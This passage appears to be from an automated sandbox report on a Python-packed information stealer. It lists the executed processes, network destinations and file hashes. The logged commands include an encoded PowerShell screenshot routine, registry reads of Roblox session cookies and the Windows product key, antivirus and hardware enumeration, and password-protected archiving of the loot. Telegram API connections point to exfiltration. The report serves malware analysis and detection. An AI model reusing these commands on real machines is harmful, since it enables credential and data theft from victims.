yAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
C:\Windows\System32\Wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\tasklist.exe
tasklist /FO LIST
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
C:\Windows\system32\systeminfo.exe
systeminfo
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ryxcfems\ryxcfems.cmdline"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES613A.tmp" "c:\Users\Admin\AppData\Local\Temp\ryxcfems\CSC37D19315D02B4BE3945D70BB787FED41.TMP"
C:\Windows\system32\tree.com
tree /A /F
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3735b8bdcdd075c23d487a98171a62ac 5njNrj9DDkGKmllQryOZ0g.0.1.0.0.0
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\getmac.exe
getmac
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI37122\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\nsW0k.zip" *"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\_MEI37122\rar.exe
C:\Users\Admin\AppData\Local\Temp\_MEI37122\rar.exe a -r -hp"yuchi" "C:\Users\Admin\AppData\Local\Temp\nsW0k.zip" *
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic os get Caption"
C:\Windows\System32\Wbem\WMIC.exe
wmic os get Caption
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get totalphysicalmemory
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | blank-gsmp0.in | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | gstatic.com | udp |
| GB | 172.217.16.227:443 | gstatic.com | tcp |
| US | 8.8.8.8:53 | 68.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.165.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\_MEI37122\python311.dll
| MD5 | 5f6fd64ec2d7d73ae49c34dd12cedb23 |
| SHA1 | c6e0385a868f3153a6e8879527749db52dce4125 |
| SHA256 | ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967 |
| SHA512 | c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\VCRUNTIME140.dll
| MD5 | 49c96cecda5c6c660a107d378fdfc3d4 |
| SHA1 | 00149b7a66723e3f0310f139489fe172f818ca8e |
| SHA256 | 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc |
| SHA512 | e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d |
memory/4488-26-0x00007FFC66A60000-0x00007FFC67049000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37122\base_library.zip
| MD5 | 32ede00817b1d74ce945dcd1e8505ad0 |
| SHA1 | 51b5390db339feeed89bffca925896aff49c63fb |
| SHA256 | 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a |
| SHA512 | a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_ctypes.pyd
| MD5 | 00f75daaa7f8a897f2a330e00fad78ac |
| SHA1 | 44aec43e5f8f1282989b14c4e3bd238c45d6e334 |
| SHA256 | 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f |
| SHA512 | f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4 |
memory/4488-33-0x00007FFC7B0B0000-0x00007FFC7B0BF000-memory.dmp
memory/4488-32-0x00007FFC7A450000-0x00007FFC7A473000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\_MEI37122\libffi-8.dll
| MD5 | 08b000c3d990bc018fcb91a1e175e06e |
| SHA1 | bd0ce09bb3414d11c91316113c2becfff0862d0d |
| SHA256 | 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece |
| SHA512 | 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_sqlite3.pyd
| MD5 | 1a8fdc36f7138edcc84ee506c5ec9b92 |
| SHA1 | e5e2da357fe50a0927300e05c26a75267429db28 |
| SHA256 | 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882 |
| SHA512 | 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_socket.pyd
| MD5 | 1a34253aa7c77f9534561dc66ac5cf49 |
| SHA1 | fcd5e952f8038a16da6c3092183188d997e32fb9 |
| SHA256 | dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f |
| SHA512 | ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_queue.pyd
| MD5 | 347d6a8c2d48003301032546c140c145 |
| SHA1 | 1a3eb60ad4f3da882a3fd1e4248662f21bd34193 |
| SHA256 | e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192 |
| SHA512 | b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_lzma.pyd
| MD5 | 542eab18252d569c8abef7c58d303547 |
| SHA1 | 05eff580466553f4687ae43acba8db3757c08151 |
| SHA256 | d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9 |
| SHA512 | b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_hashlib.pyd
| MD5 | b227bf5d9fec25e2b36d416ccd943ca3 |
| SHA1 | 4fae06f24a1b61e6594747ec934cbf06e7ec3773 |
| SHA256 | d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7 |
| SHA512 | c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_decimal.pyd
| MD5 | e3fb8bf23d857b1eb860923ccc47baa5 |
| SHA1 | 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0 |
| SHA256 | 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3 |
| SHA512 | 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_bz2.pyd
| MD5 | c413931b63def8c71374d7826fbf3ab4 |
| SHA1 | 8b93087be080734db3399dc415cc5c875de857e2 |
| SHA256 | 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293 |
| SHA512 | 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\unicodedata.pyd
| MD5 | 8c42fcc013a1820f82667188e77be22d |
| SHA1 | fba7e4e0f86619aaf2868cedd72149e56a5a87d4 |
| SHA256 | 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2 |
| SHA512 | 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\sqlite3.dll
| MD5 | dbc64142944210671cca9d449dab62e6 |
| SHA1 | a2a2098b04b1205ba221244be43b88d90688334c |
| SHA256 | 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c |
| SHA512 | 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\select.pyd
| MD5 | 45d5a749e3cd3c2de26a855b582373f6 |
| SHA1 | 90bb8ac4495f239c07ec2090b935628a320b31fc |
| SHA256 | 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876 |
| SHA512 | c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\rarreg.key
| MD5 | 4531984cad7dacf24c086830068c4abe |
| SHA1 | fa7c8c46677af01a83cf652ef30ba39b2aae14c3 |
| SHA256 | 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211 |
| SHA512 | 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\rar.exe
| MD5 | 9c223575ae5b9544bc3d69ac6364f75e |
| SHA1 | 8a1cb5ee02c742e937febc57609ac312247ba386 |
| SHA256 | 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213 |
| SHA512 | 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\libssl-3.dll
| MD5 | bf4a722ae2eae985bacc9d2117d90a6f |
| SHA1 | 3e29de32176d695d49c6b227ffd19b54abb521ef |
| SHA256 | 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147 |
| SHA512 | dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\libcrypto-3.dll
| MD5 | 78ebd9cb6709d939e4e0f2a6bbb80da9 |
| SHA1 | ea5d7307e781bc1fa0a2d098472e6ea639d87b73 |
| SHA256 | 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e |
| SHA512 | b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\bound.blank
| MD5 | 7705111a97e722d4bb4a0b91d8a6b55f |
| SHA1 | 474b52afdd55503fb2f3c2ca7c53824e8785ede8 |
| SHA256 | 6c2330df293aaff501678a9783b4b8886368cb6011465b4256bfbed4c82ea224 |
| SHA512 | c096914345acc01859d0fb03d9c2f2f215d189ec6854987e349d434f80eeccfbd71fddaeef093deda560b48c1b0fedabdd560e1e1c80c4761a9557dddba343a4 |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\_ssl.pyd
| MD5 | f9cc7385b4617df1ddf030f594f37323 |
| SHA1 | ebceec12e43bee669f586919a928a1fd93e23a97 |
| SHA256 | b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6 |
| SHA512 | 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb |
C:\Users\Admin\AppData\Local\Temp\_MEI37122\blank.aes
| MD5 | 7a959f835f18413a62817c2a945276ce |
| SHA1 | 3d77b773782ee5305486efed0286efe23f812443 |
| SHA256 | ac865b84b1fe0b4e117d77122501caa540b65ae6b3d7f1eed6fc3424cdf8709c |
| SHA512 | 4cb20a09c5f4dfb793e3dd30567d193b1744c74d3a93f54fddb2dab780ce4c466b140fa1234c738fddb7252603e60db3047424a1aab516f341057eebb8c799eb |
memory/4488-56-0x00007FFC76A50000-0x00007FFC76A7D000-memory.dmp
memory/4488-58-0x00007FFC769C0000-0x00007FFC769D9000-memory.dmp
memory/4488-60-0x00007FFC76990000-0x00007FFC769B3000-memory.dmp
memory/4488-62-0x00007FFC668E0000-0x00007FFC66A57000-memory.dmp
memory/4488-66-0x00007FFC79FC0000-0x00007FFC79FCD000-memory.dmp
memory/4488-65-0x00007FFC768E0000-0x00007FFC768F9000-memory.dmp
memory/4488-73-0x00007FFC762D0000-0x00007FFC7639D000-memory.dmp
memory/4488-72-0x00007FFC66A60000-0x00007FFC67049000-memory.dmp
memory/4488-75-0x00007FFC663C0000-0x00007FFC668E0000-memory.dmp
memory/4488-74-0x000001BAA0910000-0x000001BAA0E30000-memory.dmp
memory/4488-68-0x00007FFC763A0000-0x00007FFC763D3000-memory.dmp
memory/4488-78-0x00007FFC768C0000-0x00007FFC768D4000-memory.dmp
memory/4488-77-0x00007FFC7A450000-0x00007FFC7A473000-memory.dmp
memory/4488-80-0x00007FFC79E40000-0x00007FFC79E4D000-memory.dmp
memory/4488-83-0x00007FFC609A0000-0x00007FFC60ABC000-memory.dmp
memory/4512-89-0x00000198CB390000-0x00000198CB3B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kl5lswnq.dfg.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4488-114-0x00007FFC769C0000-0x00007FFC769D9000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bound.exe
| MD5 | 84aede3aa04bb514b90dcb124d948e1f |
| SHA1 | 8a0c6a152050a2f6cc0601b2a5c59f5f6c908c17 |
| SHA256 | 3aeebdc59e7210fd533b8b3dfc8a8c45ca7c9c0f9507aa15924b025f2c3ef1da |
| SHA512 | 38c88dbbad0abb249d5ee362a2393bdc63f78a09497e2a012f473ceef59b45de00dddac74dc001cc04a03352baec13aeaffbc587e96bc05de24fa7647e84088a |
memory/4496-116-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e907f77659a6601fcc408274894da2e |
| SHA1 | 9f5b72abef1cd7145bf37547cdb1b9254b4efe9d |
| SHA256 | 385da35673330e21ac02545220552fe301fe54dedefbdafc097ac4342a295233 |
| SHA512 | 34fa0fff24f6550f55f828541aaefe5d75c86f8f0842d54b50065e9746f9662bb7209c74c9a9571540b9855bb3851f01db613190024e89b198d485bb5dc07721 |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
memory/4496-125-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
memory/4496-129-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
memory/4496-126-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
memory/4496-128-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
memory/4496-127-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
memory/4496-130-0x00007FF69FF60000-0x00007FF6A0D69000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\onefile_4496_133633155738023538\loader.exe
| MD5 | 5a796657b6f3717a1d30cd47d29f776a |
| SHA1 | 2d87d2b839845709d122d9464b77bb5c25d410f9 |
| SHA256 | c5236198f5fc86b31951528ee1f3f881746f8a03afe9c00628b27707871d9159 |
| SHA512 | 29efda3f2c7e8e0aa406959e9b71b826c51e0dca66282320109cadb87f04ec2744a6e08cec8f87c2f2a5ea334c3a59d7eb697edd667ff0f49974f29a74fc908d |
C:\Users\Admin\AppData\Local\Temp\onefile_4496_133633155738023538\vcruntime140.dll
| MD5 | f12681a472b9dd04a812e16096514974 |
| SHA1 | 6fd102eb3e0b0e6eef08118d71f28702d1a9067c |
| SHA256 | d66c3b47091ceb3f8d3cc165a43d285ae919211a0c0fcb74491ee574d8d464f8 |
